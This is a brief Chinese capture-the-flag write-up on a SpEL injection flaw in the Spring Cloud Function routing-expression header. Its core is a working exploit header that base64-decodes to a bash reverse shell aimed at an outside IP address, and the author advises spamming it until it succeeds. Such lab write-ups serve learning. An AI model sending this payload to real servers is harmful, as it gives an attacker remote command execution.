漏洞描述:SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 P.S 卡慢不影响拿flag

进入容器,POST方法添加请求头

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMC4xOTYuNjYuNDQvODg4OCAwPiYx}|{base64,-d}|{bash,-i}")

反弹shell,因为很卡,所以狂发,只要成功一次就OK